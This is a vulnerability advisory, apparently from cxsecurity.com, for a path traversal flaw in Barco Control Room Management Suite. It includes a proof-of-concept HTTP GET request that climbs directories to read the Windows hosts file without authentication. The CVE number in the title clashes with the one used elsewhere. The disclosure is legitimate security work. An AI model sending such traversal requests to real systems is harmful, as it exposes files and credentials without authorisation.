Barco Control Room Management Suite Directory Traversal

2022.04.04
Credit: Murat Aydemir
Risk: Medium
Local: No
Remote: Yes
CWE: CWE-22

*I. SUMMARY* Title: [CVE-2022-2623] Barco Control Room Management Suite File Path Traversal Vulnerability Product: Barco Control Room Management Suite before 2.9 build 0275 and all prior versions Vulnerability Type: File Path Traversal Credit by/Researcher: Murat Aydemir from Accenture Cyber Security Team (Prague CFC) Contact: https://twitter.com/mrtydmr75 Github: https://github.com/murataydemir *II. CVE REFERENCE, CVSS SCORES & VULNERABILITY TYPES* CVE Number: CVE-2022-26233 CVSSv3: Base score: 7.5 Impact 3.6 Exploitability: 3.9 CVSSv3 Vector: 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) Vulnerability Type: File Path Traversal CWE ID: CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') *III. PROOF OF CONCEPT (POC) FOR CVE-2022-26233* Due to lack of input sanitizing inputs which come from url, an application is vulnerable to file path traversal vulnerability. A succesfully exploitation of this vulnerability could lead to access/read files and directories stored on file system including application source code or configuration and critical system files. No authentication is required to exploit this vulnerability. An attacker who is not logged into the application can easily exploit this vulnerability. GET /..\..\..\..\..\..\..\..\..\..\windows\System32\drivers\etc\hosts HTTP/1.1 Host: vulnerablehost User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:81.0) Gecko/20100101 Firefox/81.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: close [image: file-path-traversal.PNG] *IV. REFERENCE(S)* https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-26233 https://nvd.nist.gov/vuln/detail/CVE-2022-26233 https://www.barco.com/en/support/knowledge-base/kb115*XX*


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2022, cxsecurity.com

 

Back to Top